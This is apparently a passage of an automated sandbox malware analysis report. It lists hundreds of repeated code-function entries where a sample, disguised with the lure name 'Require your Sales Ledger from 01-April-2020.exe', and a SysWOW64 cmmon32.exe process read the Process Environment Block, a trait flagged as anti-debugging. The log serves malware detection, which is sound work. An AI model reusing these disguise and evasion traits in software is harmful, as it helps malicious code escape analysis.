                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01276CF0 mov eax, dword ptr fs:[00000030h]24_2_01276CF0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01276CF0 mov eax, dword ptr fs:[00000030h]24_2_01276CF0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C8CD6 mov eax, dword ptr fs:[00000030h]24_2_012C8CD6
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122E730 mov eax, dword ptr fs:[00000030h]24_2_0122E730
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C070D mov eax, dword ptr fs:[00000030h]24_2_012C070D
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C070D mov eax, dword ptr fs:[00000030h]24_2_012C070D
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122A70E mov eax, dword ptr fs:[00000030h]24_2_0122A70E
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122A70E mov eax, dword ptr fs:[00000030h]24_2_0122A70E
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F4F2E mov eax, dword ptr fs:[00000030h]24_2_011F4F2E
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011F4F2E mov eax, dword ptr fs:[00000030h]24_2_011F4F2E
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121F716 mov eax, dword ptr fs:[00000030h]24_2_0121F716
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0128FF10 mov eax, dword ptr fs:[00000030h]24_2_0128FF10
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0128FF10 mov eax, dword ptr fs:[00000030h]24_2_0128FF10
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0120FF60 mov eax, dword ptr fs:[00000030h]24_2_0120FF60
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C8F6A mov eax, dword ptr fs:[00000030h]24_2_012C8F6A
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0120EF40 mov eax, dword ptr fs:[00000030h]24_2_0120EF40
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01277794 mov eax, dword ptr fs:[00000030h]24_2_01277794
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01277794 mov eax, dword ptr fs:[00000030h]24_2_01277794
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01277794 mov eax, dword ptr fs:[00000030h]24_2_01277794
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01208794 mov eax, dword ptr fs:[00000030h]24_2_01208794
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012337F5 mov eax, dword ptr fs:[00000030h]24_2_012337F5
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012AFE3F mov eax, dword ptr fs:[00000030h]24_2_012AFE3F
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011FC600 mov eax, dword ptr fs:[00000030h]24_2_011FC600
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011FC600 mov eax, dword ptr fs:[00000030h]24_2_011FC600
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011FC600 mov eax, dword ptr fs:[00000030h]24_2_011FC600
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01228E00 mov eax, dword ptr fs:[00000030h]24_2_01228E00
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012B1608 mov eax, dword ptr fs:[00000030h]24_2_012B1608
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122A61C mov eax, dword ptr fs:[00000030h]24_2_0122A61C
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0122A61C mov eax, dword ptr fs:[00000030h]24_2_0122A61C
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_011FE620 mov eax, dword ptr fs:[00000030h]24_2_011FE620
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0120766D mov eax, dword ptr fs:[00000030h]24_2_0120766D
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121AE73 mov eax, dword ptr fs:[00000030h]24_2_0121AE73
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121AE73 mov eax, dword ptr fs:[00000030h]24_2_0121AE73
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121AE73 mov eax, dword ptr fs:[00000030h]24_2_0121AE73
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121AE73 mov eax, dword ptr fs:[00000030h]24_2_0121AE73
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0121AE73 mov eax, dword ptr fs:[00000030h]24_2_0121AE73
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01207E41 mov eax, dword ptr fs:[00000030h]24_2_01207E41
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01207E41 mov eax, dword ptr fs:[00000030h]24_2_01207E41
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01207E41 mov eax, dword ptr fs:[00000030h]24_2_01207E41
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01207E41 mov eax, dword ptr fs:[00000030h]24_2_01207E41
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01207E41 mov eax, dword ptr fs:[00000030h]24_2_01207E41
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01207E41 mov eax, dword ptr fs:[00000030h]24_2_01207E41
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012BAE44 mov eax, dword ptr fs:[00000030h]24_2_012BAE44
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012BAE44 mov eax, dword ptr fs:[00000030h]24_2_012BAE44
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012746A7 mov eax, dword ptr fs:[00000030h]24_2_012746A7
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C0EA5 mov eax, dword ptr fs:[00000030h]24_2_012C0EA5
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C0EA5 mov eax, dword ptr fs:[00000030h]24_2_012C0EA5
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C0EA5 mov eax, dword ptr fs:[00000030h]24_2_012C0EA5
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_0128FE87 mov eax, dword ptr fs:[00000030h]24_2_0128FE87
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012216E0 mov ecx, dword ptr fs:[00000030h]24_2_012216E0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012076E2 mov eax, dword ptr fs:[00000030h]24_2_012076E2
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_01238EC7 mov eax, dword ptr fs:[00000030h]24_2_01238EC7
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012AFEC0 mov eax, dword ptr fs:[00000030h]24_2_012AFEC0
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012236CC mov eax, dword ptr fs:[00000030h]24_2_012236CC
                  Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exeCode function: 24_2_012C8ED6 mov eax, dword ptr fs:[00000030h]24_2_012C8ED6
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D98CD6 mov eax, dword ptr fs:[00000030h]32_2_04D98CD6
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D814FB mov eax, dword ptr fs:[00000030h]32_2_04D814FB
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D46CF0 mov eax, dword ptr fs:[00000030h]32_2_04D46CF0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D46CF0 mov eax, dword ptr fs:[00000030h]32_2_04D46CF0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D46CF0 mov eax, dword ptr fs:[00000030h]32_2_04D46CF0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CD849B mov eax, dword ptr fs:[00000030h]32_2_04CD849B
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CFA44B mov eax, dword ptr fs:[00000030h]32_2_04CFA44B
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D5C450 mov eax, dword ptr fs:[00000030h]32_2_04D5C450
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D5C450 mov eax, dword ptr fs:[00000030h]32_2_04D5C450
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CE746D mov eax, dword ptr fs:[00000030h]32_2_04CE746D
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D9740D mov eax, dword ptr fs:[00000030h]32_2_04D9740D
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D9740D mov eax, dword ptr fs:[00000030h]32_2_04D9740D
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D9740D mov eax, dword ptr fs:[00000030h]32_2_04D9740D
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h]32_2_04D81C06
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h]32_2_04D81C06
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h]32_2_04D81C06
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h]32_2_04D81C06
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h]32_2_04D81C06
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h]32_2_04D81C06
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h]32_2_04D81C06
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h]32_2_04D81C06
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h]32_2_04D81C06
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h]32_2_04D81C06
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h]32_2_04D81C06
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h]32_2_04D81C06
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h]32_2_04D81C06
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h]32_2_04D81C06
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D46C0A mov eax, dword ptr fs:[00000030h]32_2_04D46C0A
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D46C0A mov eax, dword ptr fs:[00000030h]32_2_04D46C0A
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D46C0A mov eax, dword ptr fs:[00000030h]32_2_04D46C0A
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D46C0A mov eax, dword ptr fs:[00000030h]32_2_04D46C0A
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CFBC2C mov eax, dword ptr fs:[00000030h]32_2_04CFBC2C
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D46DC9 mov eax, dword ptr fs:[00000030h]32_2_04D46DC9
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D46DC9 mov eax, dword ptr fs:[00000030h]32_2_04D46DC9
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D46DC9 mov eax, dword ptr fs:[00000030h]32_2_04D46DC9
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D46DC9 mov ecx, dword ptr fs:[00000030h]32_2_04D46DC9
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D46DC9 mov eax, dword ptr fs:[00000030h]32_2_04D46DC9
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D46DC9 mov eax, dword ptr fs:[00000030h]32_2_04D46DC9
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D78DF1 mov eax, dword ptr fs:[00000030h]32_2_04D78DF1
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CDD5E0 mov eax, dword ptr fs:[00000030h]32_2_04CDD5E0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CDD5E0 mov eax, dword ptr fs:[00000030h]32_2_04CDD5E0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D8FDE2 mov eax, dword ptr fs:[00000030h]32_2_04D8FDE2
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D8FDE2 mov eax, dword ptr fs:[00000030h]32_2_04D8FDE2
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D8FDE2 mov eax, dword ptr fs:[00000030h]32_2_04D8FDE2
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D8FDE2 mov eax, dword ptr fs:[00000030h]32_2_04D8FDE2
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CC2D8A mov eax, dword ptr fs:[00000030h]32_2_04CC2D8A
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CC2D8A mov eax, dword ptr fs:[00000030h]32_2_04CC2D8A
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CC2D8A mov eax, dword ptr fs:[00000030h]32_2_04CC2D8A
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CC2D8A mov eax, dword ptr fs:[00000030h]32_2_04CC2D8A
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CC2D8A mov eax, dword ptr fs:[00000030h]32_2_04CC2D8A
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CF2581 mov eax, dword ptr fs:[00000030h]32_2_04CF2581
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CF2581 mov eax, dword ptr fs:[00000030h]32_2_04CF2581
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CF2581 mov eax, dword ptr fs:[00000030h]32_2_04CF2581
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CF2581 mov eax, dword ptr fs:[00000030h]32_2_04CF2581
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CFFD9B mov eax, dword ptr fs:[00000030h]32_2_04CFFD9B
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CFFD9B mov eax, dword ptr fs:[00000030h]32_2_04CFFD9B
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CF35A1 mov eax, dword ptr fs:[00000030h]32_2_04CF35A1
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D905AC mov eax, dword ptr fs:[00000030h]32_2_04D905AC
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D905AC mov eax, dword ptr fs:[00000030h]32_2_04D905AC
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CF1DB5 mov eax, dword ptr fs:[00000030h]32_2_04CF1DB5
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CF1DB5 mov eax, dword ptr fs:[00000030h]32_2_04CF1DB5
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CF1DB5 mov eax, dword ptr fs:[00000030h]32_2_04CF1DB5
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D03D43 mov eax, dword ptr fs:[00000030h]32_2_04D03D43
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D43540 mov eax, dword ptr fs:[00000030h]32_2_04D43540
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D73D40 mov eax, dword ptr fs:[00000030h]32_2_04D73D40
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CE7D50 mov eax, dword ptr fs:[00000030h]32_2_04CE7D50
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CEC577 mov eax, dword ptr fs:[00000030h]32_2_04CEC577
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CEC577 mov eax, dword ptr fs:[00000030h]32_2_04CEC577
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D8E539 mov eax, dword ptr fs:[00000030h]32_2_04D8E539
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D4A537 mov eax, dword ptr fs:[00000030h]32_2_04D4A537
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D98D34 mov eax, dword ptr fs:[00000030h]32_2_04D98D34
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CF4D3B mov eax, dword ptr fs:[00000030h]32_2_04CF4D3B
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CF4D3B mov eax, dword ptr fs:[00000030h]32_2_04CF4D3B
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CF4D3B mov eax, dword ptr fs:[00000030h]32_2_04CF4D3B
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h]32_2_04CD3D34
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h]32_2_04CD3D34
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h]32_2_04CD3D34
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h]32_2_04CD3D34
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h]32_2_04CD3D34
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h]32_2_04CD3D34
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h]32_2_04CD3D34
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h]32_2_04CD3D34
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h]32_2_04CD3D34
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h]32_2_04CD3D34
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h]32_2_04CD3D34
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h]32_2_04CD3D34
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h]32_2_04CD3D34
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CCAD30 mov eax, dword ptr fs:[00000030h]32_2_04CCAD30
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CF36CC mov eax, dword ptr fs:[00000030h]32_2_04CF36CC
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D98ED6 mov eax, dword ptr fs:[00000030h]32_2_04D98ED6
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D7FEC0 mov eax, dword ptr fs:[00000030h]32_2_04D7FEC0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D08EC7 mov eax, dword ptr fs:[00000030h]32_2_04D08EC7
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CF16E0 mov ecx, dword ptr fs:[00000030h]32_2_04CF16E0
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CD76E2 mov eax, dword ptr fs:[00000030h]32_2_04CD76E2
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D5FE87 mov eax, dword ptr fs:[00000030h]32_2_04D5FE87
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D446A7 mov eax, dword ptr fs:[00000030h]32_2_04D446A7
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D90EA5 mov eax, dword ptr fs:[00000030h]32_2_04D90EA5
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D90EA5 mov eax, dword ptr fs:[00000030h]32_2_04D90EA5
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D90EA5 mov eax, dword ptr fs:[00000030h]32_2_04D90EA5
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CD7E41 mov eax, dword ptr fs:[00000030h]32_2_04CD7E41
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CD7E41 mov eax, dword ptr fs:[00000030h]32_2_04CD7E41
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CD7E41 mov eax, dword ptr fs:[00000030h]32_2_04CD7E41
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CD7E41 mov eax, dword ptr fs:[00000030h]32_2_04CD7E41
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CD7E41 mov eax, dword ptr fs:[00000030h]32_2_04CD7E41
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CD7E41 mov eax, dword ptr fs:[00000030h]32_2_04CD7E41
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D8AE44 mov eax, dword ptr fs:[00000030h]32_2_04D8AE44
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D8AE44 mov eax, dword ptr fs:[00000030h]32_2_04D8AE44
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CD766D mov eax, dword ptr fs:[00000030h]32_2_04CD766D
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CEAE73 mov eax, dword ptr fs:[00000030h]32_2_04CEAE73
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CEAE73 mov eax, dword ptr fs:[00000030h]32_2_04CEAE73
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CEAE73 mov eax, dword ptr fs:[00000030h]32_2_04CEAE73
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CEAE73 mov eax, dword ptr fs:[00000030h]32_2_04CEAE73
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CEAE73 mov eax, dword ptr fs:[00000030h]32_2_04CEAE73
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CCC600 mov eax, dword ptr fs:[00000030h]32_2_04CCC600
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CCC600 mov eax, dword ptr fs:[00000030h]32_2_04CCC600
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CCC600 mov eax, dword ptr fs:[00000030h]32_2_04CCC600
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CF8E00 mov eax, dword ptr fs:[00000030h]32_2_04CF8E00
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D81608 mov eax, dword ptr fs:[00000030h]32_2_04D81608
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CFA61C mov eax, dword ptr fs:[00000030h]32_2_04CFA61C
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CFA61C mov eax, dword ptr fs:[00000030h]32_2_04CFA61C
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D7FE3F mov eax, dword ptr fs:[00000030h]32_2_04D7FE3F
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CCE620 mov eax, dword ptr fs:[00000030h]32_2_04CCE620
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D037F5 mov eax, dword ptr fs:[00000030h]32_2_04D037F5
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D47794 mov eax, dword ptr fs:[00000030h]32_2_04D47794
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D47794 mov eax, dword ptr fs:[00000030h]32_2_04D47794
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D47794 mov eax, dword ptr fs:[00000030h]32_2_04D47794
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CD8794 mov eax, dword ptr fs:[00000030h]32_2_04CD8794
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CDEF40 mov eax, dword ptr fs:[00000030h]32_2_04CDEF40
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CDFF60 mov eax, dword ptr fs:[00000030h]32_2_04CDFF60
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D98F6A mov eax, dword ptr fs:[00000030h]32_2_04D98F6A
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CFA70E mov eax, dword ptr fs:[00000030h]32_2_04CFA70E
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CFA70E mov eax, dword ptr fs:[00000030h]32_2_04CFA70E
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D5FF10 mov eax, dword ptr fs:[00000030h]32_2_04D5FF10
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D5FF10 mov eax, dword ptr fs:[00000030h]32_2_04D5FF10
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D9070D mov eax, dword ptr fs:[00000030h]32_2_04D9070D
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04D9070D mov eax, dword ptr fs:[00000030h]32_2_04D9070D
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CEF716 mov eax, dword ptr fs:[00000030h]32_2_04CEF716
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CC4F2E mov eax, dword ptr fs:[00000030h]32_2_04CC4F2E
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CC4F2E mov eax, dword ptr fs:[00000030h]32_2_04CC4F2E
                  Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 32_2_04CFE730 mov eax, dword ptr fs:[00000030h]32_2_04CFE730
